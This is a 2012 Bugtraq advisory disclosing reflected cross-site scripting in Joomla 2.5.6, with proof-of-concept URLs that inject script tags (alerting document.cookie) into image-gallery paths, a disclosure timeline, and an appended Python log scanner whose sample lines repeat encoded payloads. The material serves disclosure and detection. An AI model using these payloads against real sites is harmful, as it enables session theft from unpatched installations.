Message-Id: <201209182027.q8IKRnJN005925@sf01web2.securityfocus.com>
Date: Tue, 18 Sep 2012 20:27:49 GMT
From: sschurtz@...ksecurity.de
To: bugtraq@...urityfocus.com
Subject: Joomla 2.5.6 Multiple Cross-site scripting vulnerabilities

Advisory:		Joomla 2.5.6 Multiple Cross-site scripting vulnerabilities
Advisory ID:		SSCHADV2012-014
Author:			Stefan Schurtz
Affected Software:	Successfully tested on Joomla 2.5.6
Vendor URL:		http://www.joomla.org/
Vendor Status:		fixed

==========================
Vulnerability Description
==========================

When the "Module Language Switcher . position-4" module is activated (Extensions -> Modules -> Module Manager: Module Language Switcher), multiple XSS vulnerabilities are possible.

==================
PoC-Exploit
==================

// with default sample content

http://[target]/joomla/index.php/image-gallery/"><script>alert(document.cookie)</script>/25-koala
http://[target]/joomla/index.php/image-gallery/"><script>alert('xss')</script>/25-koala

http://[target]/joomla/index.php/image-gallery/animals/25-"><script>alert(document.cookie)</script>
http://[target]/joomla/index.php/image-gallery/animals/25-"><script>alert('xss')</script>

=========
Solution
=========

Upgrade to version 2.5.7

====================
Disclosure Timeline
====================

28-Jun-2012 - vendor informed (security@...mla.org)
05-Jul-2012 - vendor informed again (security@...mla.org)
13-Sep-2012 - fixed by vendor

========
Credits
========

Vulnerabilities found and advisory written by Stefan Schurtz.

===========
References
===========

http://developer.joomla.org/security/news/540-20120902-core-xss-vulnerability
http://www.darksecurity.de/advisories/2012/SSCHADV2012-014.txt
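
A log check for the request pattern shown in the PoC section, added here as an example and not part of the original advisory: it scans combined-format access log lines for quote or angle-bracket characters in the path after index.php. The function names, the log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Client address and request target of a combined-format access log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Characters needed to close an HTML attribute and open a tag; ordinary
# Joomla SEF path segments such as "25-koala" do not contain them.
MARKUP = re.compile(r'["<>]')

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so nested encoding cannot hide markup."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def path_info_markup(request_target):
    """Return the decoded path after index.php if it carries markup, else None."""
    path = request_target.split("?", 1)[0]  # query strings are out of scope here
    _, sep, path_info = path.partition("/index.php/")
    if not sep:
        return None
    decoded = decode_fully(path_info)
    return decoded if MARKUP.search(decoded) else None

def scan(lines):
    """Return (client, decoded_path_info) for every matching log line."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        found = path_info_markup(m.group(2))
        if found is not None:
            hits.append((m.group(1), found))
    return hits

# Constructed sample lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [18/Sep/2012:20:30:01 +0000] "GET /joomla/index.php/image-gallery/animals/25-koala HTTP/1.1" 200 5120',
    '203.0.113.9 - - [18/Sep/2012:20:31:12 +0000] "GET /joomla/index.php/image-gallery/%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E/25-koala HTTP/1.1" 200 5344',
    '203.0.113.9 - - [18/Sep/2012:20:31:40 +0000] "GET /joomla/index.php/image-gallery/animals/25-%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 5344',
    '198.51.100.4 - - [18/Sep/2012:20:32:05 +0000] "GET /joomla/index.php?option=com_search&searchword=a%3Cb HTTP/1.1" 200 4100',
]
```

Calling scan(SAMPLE_LOG) returns the two requests whose path carries markup; the clean article request and the query-string request are not reported.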
